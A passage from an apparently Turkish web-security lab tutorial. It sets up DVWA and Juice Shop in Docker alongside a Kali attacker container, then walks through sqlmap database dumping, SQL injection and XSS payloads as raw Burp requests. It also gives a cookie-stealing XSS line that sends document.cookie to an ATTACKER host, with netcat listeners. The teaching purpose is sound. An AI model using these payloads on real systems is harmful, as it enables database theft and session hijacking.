mu kontrol\r\nwhich sqlmap || python3 -m pip install sqlmap\r\n<\/code><\/pre>\r\n<ol start=\"3\">\r\n<li>\r\n<p>&Ouml;nce form ile manuel test: input alan\u0131na <code>' OR '1'='1<\/code> gibi payload gir ve sonucu g&ouml;zlemle.<\/p>\r\n<\/li>\r\n<\/ol>\r\n<h3>B. Oturum cookie&rsquo;sini al (Taray\u0131c\u0131dan)<\/h3>\r\n<ul>\r\n<li>\r\n<p>Taray\u0131c\u0131da DVWA'ya giri\u015f yap.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Developer Tools -&gt; Application -&gt; Cookies -&gt; <code>PHPSESSID<\/code> ve <code>security<\/code> de\u011ferlerini kopyala.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>&Ouml;rnek cookie:<\/p>\r\n<pre><code>PHPSESSID=abcd1234; security=low\r\n<\/code><\/pre>\r\n<h3>C. sqlmap ile DB tarama<\/h3>\r\n<ol>\r\n<li>\r\n<p>Basit DB ke\u015ffi:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-bash\">sqlmap -u \"http:\/\/localhost:8081\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit\" --cookie=\"PHPSESSID=abcd1234; security=low\" --dbs --batch\r\n<\/code><\/pre>\r\n<ul>\r\n<li>\r\n<p><code>--dbs<\/code> : veritabanlar\u0131n\u0131 listeler<\/p>\r\n<\/li>\r\n<li>\r\n<p><code>--batch<\/code> : interaktif istemleri otomatik cevaplar<\/p>\r\n<\/li>\r\n<\/ul>\r\n<ol start=\"2\">\r\n<li>\r\n<p>Belirli veritaban\u0131ndaki tablolar\u0131 listele:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-bash\">sqlmap -u \"http:\/\/localhost:8081\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit\" --cookie=\"PHPSESSID=abcd1234; security=low\" -D dvwa --tables --batch\r\n<\/code><\/pre>\r\n<ol start=\"3\">\r\n<li>\r\n<p>Tablo i&ccedil;eri\u011fini d&ouml;k:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-bash\">sqlmap -u \"http:\/\/localhost:8081\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit\" --cookie=\"PHPSESSID=abcd1234; security=low\" -D dvwa -T users --dump --batch\r\n<\/code><\/pre>\r\n<h3>D. Parametre ke\u015fif (daha g&uuml;venli)<\/h3>\r\n<ul>\r\n<li>\r\n<p>E\u011fer <code>id<\/code> parametresi otomatik saptanmazsa <code>-p id<\/code> kullan:<\/p>\r\n<\/li>\r\n<\/ul>\r\n<pre><code class=\"language-bash\">sqlmap -u \"http:\/\/localhost:8081\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit\" -p id --cookie=\"...\" --dbs --batch\r\n<\/code><\/pre>\r\n<h3>E. Sonu&ccedil; \/ &ccedil;\u0131kt\u0131 beklentisi<\/h3>\r\n<ul>\r\n<li>\r\n<p><code>--dbs<\/code> &ccedil;\u0131kt\u0131s\u0131nda <code>dvwa<\/code> vb. g&ouml;receksin.<\/p>\r\n<\/li>\r\n<li>\r\n<p><code>--dump<\/code> ile <code>users<\/code> tablosuna ait sat\u0131rlar &ccedil;\u0131kar: kullan\u0131c\u0131 adlar\u0131, \u015fifre hashleri (DVWA &ouml;rne\u011finde basit hashler olabilir).<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>Faydal\u0131 ek parametreler<\/h3>\r\n<ul>\r\n<li>\r\n<p><code>--threads=5<\/code> : h\u0131z<\/p>\r\n<\/li>\r\n<li>\r\n<p><code>--risk=3 --level=5<\/code> : daha agresif test<\/p>\r\n<\/li>\r\n<li>\r\n<p><code>--tamper=space2comment<\/code> : WAF\/filtre atlatma (&ouml;\u011frenmek i&ccedil;in)<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h1>5) XSS Tutorial &mdash; Juice Shop &amp; DVWA (reflected &amp; stored)<\/h1>\r\n<h3>A. Reflected XSS (basit)<\/h3>\r\n<ul>\r\n<li>\r\n<p>Juice Shop veya DVWA&rsquo;sa reflected vekt&ouml;rler olabilir. &Ouml;rnek: URL parametreleri ile payload.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<ol>\r\n<li>\r\n<p>Basit payload test:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code>http:\/\/localhost:3000\/#\/search?q=\r\n<\/code><\/pre>\r\n<p>Juice Shop modern SPA oldu\u011fundan DOM-based XSS olabilir; alert &ccedil;al\u0131\u015f\u0131yorsa ba\u015far\u0131l\u0131d\u0131r.<\/p>\r\n<h3>B. Stored XSS (yorum alan\u0131, profil a&ccedil;\u0131klamas\u0131 vb.)<\/h3>\r\n<ol>\r\n<li>\r\n<p>Juice Shop veya DVWA&rsquo;da yorum ekleme\/feedback alan\u0131 bul.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Payload olarak:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-html\">\r\n<\/code><\/pre>\r\n<p>G&ouml;nder ve hedef sayfay\u0131 yeniden y&uuml;kleyip payload&rsquo;un &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131 do\u011frula.<\/p>\r\n<h3>C. Burp Repeater &mdash; Reflected XSS &ouml;rne\u011fi (copy\/paste haz\u0131r HTTP iste\u011fi)<\/h3>\r\n<p>A\u015fa\u011f\u0131daki template DVWA reflected &ouml;rne\u011fi i&ccedil;in basit bir GET iste\u011fi. Burp Proxy ile yakala veya do\u011frudan Repeater&rsquo;e yap\u0131\u015ft\u0131r.<\/p>\r\n<pre><code>GET \/vulnerabilities\/xss_r\/?name= HTTP\/1.1\r\nHost: localhost:8081\r\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36\r\nAccept: text\/html,application\/xhtml+xml\r\nAccept-Language: en-US,en;q=0.5\r\nConnection: close\r\nCookie: PHPSESSID=abcd1234; security=low\r\n<\/code><\/pre>\r\n<ul>\r\n<li>\r\n<p>Repeater&rsquo;de g&ouml;nder ve d&ouml;nen HTML i&ccedil;inde payload&rsquo;\u0131n &ccedil;\u0131kt\u0131s\u0131n\u0131 kontrol et. E\u011fer HTML encode edilmemi\u015fse alert &ccedil;al\u0131\u015facakt\u0131r.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>D. Burp Repeater &mdash; Stored XSS PoC (POST request &ouml;rne\u011fi)<\/h3>\r\n<p>&Ouml;rnek: bir yorum formuna POST istek atma (DVWA gibi):<\/p>\r\n<pre><code>POST \/vulnerabilities\/xss_s\/ HTTP\/1.1\r\nHost: localhost:8081\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 56\r\nCookie: PHPSESSID=abcd1234; security=low\r\n\r\nname=&amp;message=hello&amp;Submit=Submit\r\n<\/code><\/pre>\r\n<ul>\r\n<li>\r\n<p>Repeater ile iste\u011fi g&ouml;nder. E\u011fer sayfa daha sonra bu mesajlar\u0131 listeliyorsa, payload'\u0131n &ccedil;al\u0131\u015f\u0131p &ccedil;al\u0131\u015fmad\u0131\u011f\u0131n\u0131 kontrol et.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>E. Daha sofistike PoC &mdash; cookie exfiltration (&ouml;rnek, sadece lab i&ccedil;in)<\/h3>\r\n<p>PoC payload (stored) &mdash; a&ccedil;\u0131l\u0131r pencereden ziyade cookie&rsquo;yi attacker sunucusuna g&ouml;nder:<\/p>\r\n<pre><code class=\"language-html\">\r\n<\/code><\/pre>\r\n<ul>\r\n<li>\r\n<p>Not: <code>ATTACKER_IP<\/code> yerine attacker&rsquo;\u0131n IP&rsquo;sini veya host&rsquo;un reachable adresini yaz. Attacker taraf\u0131nda basit HTTP sunucu a&ccedil;:<\/p>\r\n<\/li>\r\n<\/ul>\r\n<pre><code class=\"language-bash\"># attacker konteynerinde basit dinleme\r\npython3 -m http.server 8080\r\n# veya netcat\r\nnc -lvnp 8080\r\n<\/code><\/pre>\r\n<hr>\r\n<h1>6) Burp Kullan\u0131m\u0131 Hakk\u0131nda Pratik Notlar<\/h1>\r\n<ul>\r\n<li>\r\n<p><strong>GUI &ccedil;al\u0131\u015ft\u0131rmak istersen<\/strong>: en kolay yol host makinanda Burp Suite &ccedil;al\u0131\u015ft\u0131r\u0131p taray\u0131c\u0131n\u0131 (host) Burp proxy&rsquo;ye y&ouml;nlendirmek ve taray\u0131c\u0131dan <code>http:\/\/localhost:3000<\/code>\/<code>8081<\/code> gibi adreslere eri\u015fmektir. B&ouml;ylece Burp trafi\u011fi g&ouml;rebilir, Repeater, Intruder vb. kullanabilirsin.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Konteyner i&ccedil;inde GUI &ccedil;al\u0131\u015ft\u0131rmak<\/strong>: X11 forwarding (Linux host) veya VNC kurup VNC client ile ba\u011flanma gerekir &mdash; bunun i&ccedil;in ekstra konfig&uuml;rasyon istenir.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Burp jar konteyner i&ccedil;inde<\/strong>: <code>java -jar \/opt\/burp\/burpsuite.jar<\/code> &ccedil;al\u0131\u015ft\u0131r\u0131l\u0131r (e\u011fer jar kopyaland\u0131ysa). GUI i&ccedil;in X11 veya VNC gerekli.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Proxy + docker network<\/strong>: Host taray\u0131c\u0131s\u0131ndan yapt\u0131\u011f\u0131n istekler do\u011frudan konteynerin host-mapped portlar\u0131na gider. E\u011fer Burp konteyner i&ccedil;indeyse ve host taray\u0131c\u0131dan kullanacaksan, Burp&rsquo;\u0131n dinledi\u011fi portu <code>ports:<\/code> ile expose et veya a\u011f ayarlar\u0131n\u0131 kontrol et.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<p>&nbsp;<\/p>\r\n<h1>Laboratuvar :<\/h1>\r\n<h1>A &mdash; GUI (VNC + Fluxbox + noVNC) i&ccedil;eren &ouml;zel attacker image<\/h1>\r\n<blockquote>\r\n<p>Not: Burp Suite <code>.jar<\/code> telifli oldu\u011fu i&ccedil;in Dockerfile otomatik indirme yapmaz. E\u011fer Burp kullanacaksan, kendi indirdi\u011fin <code>burpsuite.jar<\/code> dosyas\u0131n\u0131 bu build context&rsquo;e koy. Alternatif olarak <code>INCLUDE_BURP=no<\/code> b\u0131rak\u0131p sadece ZAP kullanabilirsin.<\/p>\r\n<\/blockquote>\r\n<h3>1) <code>Dockerfile.gui<\/code> (k&ouml;k dizine koy)<\/h3>\r\n<pre><code class=\"language-dockerfile\"># Dockerfile.gui\r\nFROM kalilinux\/kali-rolling\r\n\r\nARG BURP_JAR=burpsuite.jar\r\nARG INCLUDE_BURP=no\r\n\r\nENV DEBIAN_FRONTEND=noninteractive\r\nRUN apt-get update &amp;&amp; apt-get install -y \\\r\n    xfce4 xfce4-terminal fluxbox x11vnc novnc websockify \\\r\n    python3 python3-pip git curl wget net-tools iputils-ping \\\r\n    default-jre-headless openjdk-11-jre-headless \\\r\n    sqlmap chromium pulseaudio supervisor unzip \\\r\n    &amp;&amp; apt-get clean &amp;&amp; rm -rf \/var\/lib\/apt\/lists\/*\r\n\r\n# pip ara&ccedil;lar\u0131\r\nRUN pip3 install --upgrade pip &amp;&amp; pip3 install websockify\r\n\r\n# &ccedil;al\u0131\u015fma dizini\r\nWORKDIR \/root\r\n\r\n# Burp jar (iste\u011fe ba\u011fl\u0131, build context'e koy)\r\nARG INCLUDE_BURP\r\nCOPY entrypoint-gui.sh \/usr\/local\/bin\/entrypoint-gui.sh\r\nRUN chmod +x \/usr\/local\/bin\/entrypoint-gui.sh\r\n\r\n# E\u011fer kullan\u0131c\u0131 burp jar'\u0131n\u0131 koyduysa kopyala (opsiyonel)\r\nCOPY ${BURP_JAR} \/opt\/burp\/${BURP_JAR}\r\n\r\nEXPOSE 5901    # VNC\r\nEXPOSE 6080    # noVNC (web client)\r\nEXPOSE 8080    # Burp proxy listener (host access)\r\nVOLUME [\"\/root\"]\r\n\r\nENTRYPOINT [\"\/usr\/local\/bin\/entrypoint-gui.sh\"]\r\nCMD [\"\/bin\/bash\"]\r\n<\/code><\/pre>\r\n<h3>2) <code>entrypoint-gui.sh<\/code> (ayn\u0131 dizine koy)<\/h3>\r\n<pre><code class=\"language-bash\">#!\/bin\/bash\r\nset -e\r\n\r\n# Basit fluxbox + x11vnc + noVNC ba\u015flatma entrypoint\r\nDISPLAY_NUM=1\r\nDISPLAY=\":${DISPLAY_NUM}\"\r\n\r\n# Fluxbox config yoksa default\r\nmkdir -p \/root\/.vnc\r\n\r\n# Ba\u015flatma komutlar\u0131\r\n# 1) X server (Xvfb) yerine do\u011frudan fluxbox ile kullan\u0131labilecek hafif &ccedil;&ouml;z&uuml;m:\r\n# Fluxbox ile bir X sunucusu gereklidir; burada Xvfb yerine Xorg yerine xfce4-session ele ald\u0131k.\r\n# Basit ve yayg\u0131n yakla\u015f\u0131m: start fluxbox in background using Xvfb\r\nXvfb ${DISPLAY} -screen 0 1024x768x24 &amp;\r\n\r\nexport DISPLAY=${DISPLAY}\r\n\r\n# Ba\u015flat fluxbox\r\nfluxbox &amp;\r\n\r\n# Ba\u015flat x11vnc (VNC eri\u015fimi)\r\nx11vnc -display ${DISPLAY} -forever -nopw -rfbport 5901 -shared &amp;\r\n\r\n# Ba\u015flat noVNC (web &uuml;zerinden VNC)\r\n# websockify ile 5901 -&gt; 6080\r\nwebsockify --web=\/usr\/share\/novnc\/ 6080 localhost:5901 &amp;\r\n\r\n# E\u011fer burp jar varsa arka planda ba\u015flat (GUI i&ccedil;in a&ccedil;\u0131lacak pencerede &ccedil;al\u0131\u015f\u0131r)\r\nif [ -f \/opt\/burp\/${BURP_JAR} ] &amp;&amp; [ \"${INCLUDE_BURP}\" != \"no\" ]; then\r\n  echo \"[*] Burp jar bulundu, ba\u015flat\u0131l\u0131yor...\"\r\n  # Burp GUI'nin ayn\u0131 X display &uuml;zerinde ba\u015flamas\u0131 i&ccedil;in:\r\n  java -jar \/opt\/burp\/${BURP_JAR} &amp;&gt;\/root\/burp.log &amp;\r\nelse\r\n  echo \"[*] Burp jar yok veya INCLUDE_BURP=no. Burp kullanmak istiyorsan burpsuite.jar dosyas\u0131n\u0131 build context'e koy ve INCLUDE_BURP arg'\u0131n\u0131 yes yap.\"\r\nfi\r\n\r\n# E\u011fer Burp proxy olarak &ccedil;al\u0131\u015ft\u0131rmak istersen portu expose et (genelde GUI &uuml;zerinden ayarlan\u0131r).\r\n# Bekle ve container interaktif shell ver\r\nexec \"$@\"\r\n<\/code><\/pre>\r\n<blockquote>\r\n<p>A&ccedil;\u0131klama: bu entrypoint basit bir setup sa\u011flar: Xvfb (virtual X), fluxbox pencere y&ouml;neticisi, x11vnc ve noVNC. noVNC taray\u0131c\u0131dan VNC eri\u015fimi sa\u011flar: <code>http:\/\/HOST:6080<\/code> ile taray\u0131c\u0131da GUI g&ouml;rebilirsin. Burp GUI &ccedil;al\u0131\u015ft\u0131r\u0131lacaksa jar dosyas\u0131 container i&ccedil;inde <code>\/opt\/burp\/<\/code> konumunda olmal\u0131 ve build arg ile <code>INCLUDE_BURP<\/code> ayarlanmal\u0131.<\/p>\r\n<\/blockquote>\r\n<hr>\r\n<h1>B &mdash; <code>docker-compose.yml<\/code> (GUI attacker entegre)<\/h1>\r\n<p>K&ouml;k dizine a\u015fa\u011f\u0131y\u0131 koy:<\/p>\r\n<pre><code class=\"language-yaml\">version: \"3.8\"\r\nservices:\r\n  attacker_gui:\r\n    build:\r\n      context: .\r\n      dockerfile: Dockerfile.gui\r\n      args:\r\n        INCLUDE_BURP: \"yes\"   # burp jar koyduysan \"yes\" yap; yoksa \"no\"\r\n        BURP_JAR: \"burpsuite.jar\"\r\n    image: weblab\/attacker-gui:latest\r\n    container_name: attacker_gui\r\n    tty: true\r\n    stdin_open: true\r\n    ports:\r\n      - \"5901:5901\"   # VNC (optional)\r\n      - \"6080:6080\"   # noVNC web UI\r\n      - \"8080:8080\"   # Burp proxy listener (expose edilecek)\r\n    volumes:\r\n      - .\/attacker-data:\/root\r\n    networks:\r\n      - web-lab\r\n    restart: unless-stopped\r\n\r\n  # (&ouml;nceki hedefler: juice_shop\/dvwa vb. buraya eklenir)\r\n  dvwa_db:\r\n    image: mysql:5.7\r\n    environment:\r\n      MYSQL_ROOT_PASSWORD: rootpass\r\n      MYSQL_DATABASE: dvwa\r\n      MYSQL_USER: dvwauser\r\n      MYSQL_PASSWORD: dvwapass\r\n    volumes:\r\n      - dvwa_db_data:\/var\/lib\/mysql\r\n    networks:\r\n      - web-lab\r\n\r\n  dvwa:\r\n    image: vulnerables\/web-dvwa:latest\r\n    environment:\r\n      - MYSQL_HOST=dvwa_db\r\n      - MYSQL_USER=dvwauser\r\n      - MYSQL_PASSWORD=dvwapass\r\n      - MYSQL_DATABASE=dvwa\r\n    ports:\r\n      - \"8081:80\"\r\n    depends_on:\r\n      - dvwa_db\r\n    networks:\r\n      - web-lab\r\n\r\n  juice_shop:\r\n    image: bkimminich\/juice-shop:latest\r\n    ports:\r\n      - \"3000:3000\"\r\n    networks:\r\n      - web-lab\r\n\r\nnetworks:\r\n  web-lab:\r\n    driver: bridge\r\n\r\nvolumes:\r\n  dvwa_db_data:\r\n  attacker-data:\r\n<\/code><\/pre>\r\n<h3>Build &amp; Run:<\/h3>\r\n<pre><code class=\"language-bash\"># Build attacker-gui image (burp jar'\u0131n\u0131 koyduysan INCLUDE_BURP=yes)\r\ndocker-compose build attacker_gui\r\n\r\n# Boot up\r\ndocker-compose up -d\r\n<\/code><\/pre>\r\n<ul>\r\n<li>\r\n<p>noVNC (web VNC): <code>http:\/\/localhost:6080<\/code> &mdash; taray\u0131c\u0131dan fluxbox masa&uuml;st&uuml;ne eri\u015f.<\/p>\r\n<\/li>\r\n<li>\r\n<p>VNC client: <code>vnc:\/\/localhost:5901<\/code> (parolas\u0131z, dikkat: yaln\u0131zca yerelde ve izole a\u011fda kullan).<\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp proxy portu konteynerde otomatik ayarlanmaz &mdash; Burp GUI i&ccedil;inde Proxy -&gt; Options k\u0131sm\u0131ndan Listener ekleyip <code>0.0.0.0:8080<\/code> dinlemesini a&ccedil;; b&ouml;ylece host <code>http:\/\/localhost:8080<\/code> &uuml;zerinden Burp proxy&rsquo;ye ula\u015fabilir.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h1>C &mdash; Burp Proxy&rsquo;yi container i&ccedil;inde &ccedil;al\u0131\u015ft\u0131r\u0131p host taray\u0131c\u0131y\u0131 proxy&rsquo;e y&ouml;nlendirme (X11 yerine kolay yol)<\/h1>\r\n<p>En kolay, sa\u011flam ve pratik yol: Burp GUI&rsquo;yi container i&ccedil;inde <strong>noVNC &uuml;zerinden a&ccedil;<\/strong>, Burp GUI i&ccedil;inden Proxy &rarr; Options &rarr; Add &rarr; Listener <code>0.0.0.0:8080<\/code> \u015feklinde ekle. Sonra host taray\u0131c\u0131y\u0131 \u015fu \u015fekilde ayarla:<\/p>\r\n<ol>\r\n<li>\r\n<p>Host taray\u0131c\u0131nda HTTP proxy ayar\u0131n\u0131 <code>localhost<\/code> port <code>8080<\/code> yap. &Ouml;rne\u011fin:<\/p>\r\n<ul>\r\n<li>\r\n<p>Firefox: Settings &rarr; Network Settings &rarr; Manual proxy configuration &rarr; HTTP Proxy: <code>127.0.0.1<\/code>, Port: <code>8080<\/code>.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Chrome: Sistem proxy ayar\u0131n\u0131 kullan &mdash; i\u015fletim sistemine g&ouml;re ayarla (Windows: Internet Options &rarr; LAN settings; Linux: env veya GNOME network settings).<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p>Burp CA sertifikas\u0131n\u0131 (TLS intercept i&ccedil;in) host taray\u0131c\u0131ya y&uuml;kle:<\/p>\r\n<ul>\r\n<li>\r\n<p>noVNC ile Burp GUI&rsquo;ye gir: <code>http:\/\/localhost:6080<\/code> &rarr; Burp a&ccedil;.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp &rarr; Proxy &rarr; Intercept a&ccedil;\u0131kken host taray\u0131c\u0131dan herhangi bir HTTPS siteye git; Burp otomatik olarak HTTPS trafi\u011fini durdurursa, Burp&rsquo;un CA sertifikas\u0131n\u0131 export et: Burp &rarr; Proxy &rarr; Options &rarr; CA Certificate &rarr; <code>Export \/ Save<\/code> veya <code>http:\/\/burp<\/code> (Burp&rsquo;un embedded CA web sayfas\u0131).<\/p>\r\n<\/li>\r\n<li>\r\n<p>Host taray\u0131c\u0131ya bu sertifikay\u0131 g&uuml;venilir CA olarak y&uuml;kle (testlab i&ccedil;in ge&ccedil;ici).<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p>Art\u0131k host taray\u0131c\u0131 ile normal \u015fekilde <code>http:\/\/localhost:8081<\/code> (DVWA) veya <code>http:\/\/localhost:3000<\/code> (Juice Shop) adreslerine gidip t&uuml;m trafi\u011fin Burp &uuml;zerinden ge&ccedil;ti\u011fini g&ouml;zlemleyebilirsin. Burp GUI noVNC i&ccedil;inde g&ouml;r&uuml;n&uuml;yor; proxy portu host&rsquo;a a&ccedil;\u0131k oldu\u011fu i&ccedil;in X11 y&ouml;nlendirmeye gerek yok.<\/p>\r\n<\/li>\r\n<\/ol>\r\n<blockquote>\r\n<p>&Ouml;zet: noVNC ile Burp GUI&rsquo;ye ba\u011flan &rarr; Burp i&ccedil;inde proxy listener a&ccedil; <code>0.0.0.0:8080<\/code> &rarr; host taray\u0131c\u0131da proxy ayarla &rarr; (iste\u011fe ba\u011fl\u0131) Burp CA&rsquo;y\u0131 host taray\u0131c\u0131ya y&uuml;kle.<\/p>\r\n<\/blockquote>\r\n<hr>\r\n<h1>D &mdash; Burp Repeater oturumlar\u0131: Tam reproducible raw HTTP &ouml;rnekleri (SQLi &amp; XSS)<\/h1>\r\n<p>A\u015fa\u011f\u0131daki istekleri Burp Proxy ile yakala veya do\u011frudan <strong>Repeater<\/strong>&rsquo;a yap\u0131\u015ft\u0131r. <code>Cookie<\/code> sat\u0131r\u0131n\u0131 kendi &ccedil;al\u0131\u015f\u0131r oturum <code>PHPSESSID<\/code> ile de\u011fi\u015ftir ve <code>Host<\/code>\/URL&rsquo;leri kendi ortam\u0131na g&ouml;re ayarla (localhost:8081 DVWA &ouml;rne\u011fi).<\/p>\r\n<h2>1) SQLi &mdash; GET reflected parameter (DVWA <code>sqli<\/code>)<\/h2>\r\n<h3>Request (copy\/paste to Repeater)<\/h3>\r\n<pre><code>GET \/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit HTTP\/1.1\r\nHost: localhost:8081\r\nUser-Agent: Mozilla\/5.0\r\nAccept: text\/html\r\nConnection: close\r\nCookie: PHPSESSID=REPLACE_WITH_YOUR_SESSION; security=low\r\n<\/code><\/pre>\r\n<h3>Nas\u0131l test edilir (manip&uuml;lasyon)<\/h3>\r\n<ul>\r\n<li>\r\n<p>Repeater i&ccedil;inde <code>id=1<\/code> yerine \u015fu payload&rsquo;\u0131 koy:<\/p>\r\n<\/li>\r\n<\/ul>\r\n<pre><code>id=1' OR '1'='1\r\n<\/code><\/pre>\r\n<p>Yani sat\u0131r\u0131 \u015fu hale getir:<\/p>\r\n<pre><code>GET \/vulnerabilities\/sqli\/?id=1'%20OR%20'1'='1&amp;Submit=Submit HTTP\/1.1\r\n<\/code><\/pre>\r\n<p>(Repeater&rsquo;de URL encode\/encode etmeye dikkat et; do\u011frudan body veya param alan\u0131na yazabilirsin.)<\/p>\r\n<h3>Beklenen yan\u0131t \/ neye bakmal\u0131<\/h3>\r\n<ul>\r\n<li>\r\n<p>E\u011fer uygulama <code>id<\/code> parametresini do\u011frudan SQL sorgusuna ekliyorsa ve filtrasyon yoksa, sorgu t&uuml;m kay\u0131tlar\u0131 d&ouml;nd&uuml;rebilir. HTML &ccedil;\u0131kt\u0131 b&ouml;l&uuml;m&uuml;nde daha fazla sonu&ccedil; veya DB sat\u0131r\u0131 g&ouml;r&uuml;rs&uuml;n.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Hata tabanl\u0131 SQLi&rsquo;de SQL hatas\u0131 mesajlar\u0131 (MySQL error) d&ouml;nebilir; &ouml;rn. <code>You have an error in your SQL syntax<\/code> gibi.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Ekran g&ouml;r&uuml;nt&uuml;s&uuml; (metin \u015feklinde):<\/p>\r\n<ul>\r\n<li>\r\n<p><code>screenshots\/sqli-repeater-response.txt<\/code> i&ccedil;eri\u011fi &ouml;rne\u011fi: HTML i&ccedil;erisinde <code>username<\/code> veya <code>user id<\/code> listesi, ya da SQL error trace.<\/p>\r\n<\/li>\r\n<li>\r\n<p>&Ouml;rnek beklenen sat\u0131r: <code>User ID: 1 - admin<\/code> veya <code>SQL syntax error near 'OR '1'='1'<\/code>.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<\/ul>\r\n<h3>Manuel PoC: basit boolean test<\/h3>\r\n<ul>\r\n<li>\r\n<p>Payload: <code>id=1' AND 1=1 -- -<\/code> ve <code>id=1' AND 1=2 -- -<\/code> fark\u0131n\u0131 kontrol et. <code>1=1<\/code> ile sayfa normal d&ouml;ner, <code>1=2<\/code> ile i&ccedil;erik de\u011fi\u015fiyorsa boolean-based SQLi.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>2) SQLi &mdash; POST &ouml;rne\u011fi (e\u011fer form POST ise)<\/h2>\r\n<h3>Request (POST)<\/h3>\r\n<pre><code>POST \/some\/vuln\/post.php HTTP\/1.1\r\nHost: localhost:8081\r\nUser-Agent: Mozilla\/5.0\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 30\r\nCookie: PHPSESSID=REPLACE; security=low\r\n\r\nid=1&amp;name=foo\r\n<\/code><\/pre>\r\n<h3>Repeater manipulasyon:<\/h3>\r\n<ul>\r\n<li>\r\n<p><code>id=1<\/code> &rarr; <code>id=1' OR '1'='1<\/code><\/p>\r\n<\/li>\r\n<li>\r\n<p>G&ouml;nder ve response i&ccedil;inde beklenen: fazla kay\u0131t, DB verileri ya da hata mesajlar\u0131.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>3) XSS &mdash; Reflected (DVWA reflected example)<\/h2>\r\n<h3>Request (GET reflected param)<\/h3>\r\n<pre><code>GET \/vulnerabilities\/xss_r\/?name=&lt;script&gt;alert('XSS')&lt;\/script&gt; HTTP\/1.1\r\nHost: localhost:8081\r\nUser-Agent: Mozilla\/5.0\r\nAccept: text\/html\r\nConnection: close\r\nCookie: PHPSESSID=REPLACE; security=low\r\n<\/code><\/pre>\r\n<h3>Beklenen yan\u0131t \/ neye bakmal\u0131<\/h3>\r\n<ul>\r\n<li>\r\n<p>E\u011fer site payload&rsquo;\u0131 HTML i&ccedil;inde encode etmeden geri d&ouml;nd&uuml;r&uuml;yorsa, taray\u0131c\u0131da <code>alert('XSS')<\/code> &ccedil;al\u0131\u015f\u0131r. Repeater response HTML g&ouml;vdesinde <code>&amp;lt;script&amp;gt;<\/code> yerine direkt <code>&lt;script&gt;alert('XSS')&lt;\/script&gt;<\/code> g&ouml;r&uuml;nmeli.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Ekran g&ouml;r&uuml;nt&uuml;s&uuml; (metin): <code>screenshots\/xss-repeater-response.txt<\/code> i&ccedil;eri\u011finde: <code>&lt;h2&gt;Hello &lt;script&gt;alert('XSS')&lt;\/script&gt;&lt;\/h2&gt;<\/code> veya benzeri.<\/p>\r\n<\/li>\r\n<li>\r\n<p>PoC ekran g&ouml;r&uuml;nt&uuml;s&uuml; metni: &ldquo;Taray\u0131c\u0131da a&ccedil;\u0131lan alert penceresi: <code>alert('XSS')<\/code>&rdquo; &mdash; (metin a&ccedil;\u0131klamas\u0131).<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>G&uuml;venlik notu<\/h3>\r\n<ul>\r\n<li>\r\n<p>Taray\u0131c\u0131 alert &ccedil;al\u0131\u015fmas\u0131 en basit PoC&rsquo;dur; ger&ccedil;ek exfiltration i&ccedil;in payload <code>new Image().src=\"http:\/\/ATTACKER:PORT\/?c=\"+document.cookie<\/code> gibi olabilir.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>4) XSS &mdash; Stored (POST yorum formu)<\/h2>\r\n<h3>POST &ouml;rne\u011fi (DVWA stored XSS)<\/h3>\r\n<pre><code>POST \/vulnerabilities\/xss_s\/ HTTP\/1.1\r\nHost: localhost:8081\r\nUser-Agent: Mozilla\/5.0\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 78\r\nCookie: PHPSESSID=REPLACE; security=low\r\n\r\nname=&lt;script&gt;alert('STOREDXSS')&lt;\/script&gt;&amp;message=Hello%20world&amp;Submit=Submit\r\n<\/code><\/pre>\r\n<h3>Beklenen yan\u0131t<\/h3>\r\n<ul>\r\n<li>\r\n<p>Repeater g&ouml;nderiminden sonra sayfay\u0131 g&ouml;r&uuml;nt&uuml;leyen ba\u015fka bir kullan\u0131c\u0131\/oturum payload'\u0131 tetikler. HTML i&ccedil;erisinde depolanm\u0131\u015f <code>&lt;script&gt;alert('STOREDXSS')&lt;\/script&gt;<\/code> g&ouml;r&uuml;l&uuml;r.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Ekran g&ouml;r&uuml;nt&uuml;s&uuml; (metin): &ldquo;Stored XSS payload&rsquo;\u0131n\u0131n bulundu\u011fu sayfa HTML snippet&rsquo;i: <code>...&lt;div 